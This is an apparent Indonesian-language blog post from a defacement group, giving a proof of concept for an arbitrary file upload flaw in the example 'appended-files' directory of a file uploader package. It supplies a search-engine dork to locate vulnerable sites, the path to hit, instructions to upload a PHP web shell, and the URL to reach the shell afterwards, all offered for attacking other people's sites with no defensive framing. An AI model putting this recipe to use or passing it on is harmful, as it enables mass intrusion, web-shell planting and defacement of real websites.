Deface Metode Appended Files Example Fileuploader

Author: BabyMoon aka. RomDhoni7
Greetz: Infinity Cyber Team

Proof of Concept (POC): Appended Files Example Fileuploader (Arbitary File Upload Vulnerability).

Penjelasan: Poc ini terjadi karena adanya bug di dir /appended-files/ sehingga attacker dengan mudah bisa menguploadkan shell php ke server.

Dork: inurl:/fileuploader-master/examples/appended-files/
etc.

Exploit:site.com//assets/cwcontrol/theme/fileuploader-master/examples/appended-files/

Step by Step:

Dork dulu pakai dork diatas

Pilih salah satu site, lalu kasih exploit: /assets/cwcontrol/theme/fileuploader-master/examples/appended-files/

Lalu tinggal kalian upload shellnya

Akses shell?, kalian tinggal kasih exploit uploads/namashellmu.php dibelakang target.

Contoh: site.com/assets/cwcontrol/theme/fileuploader-master/examples/appended-files/uploads/shell.php

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel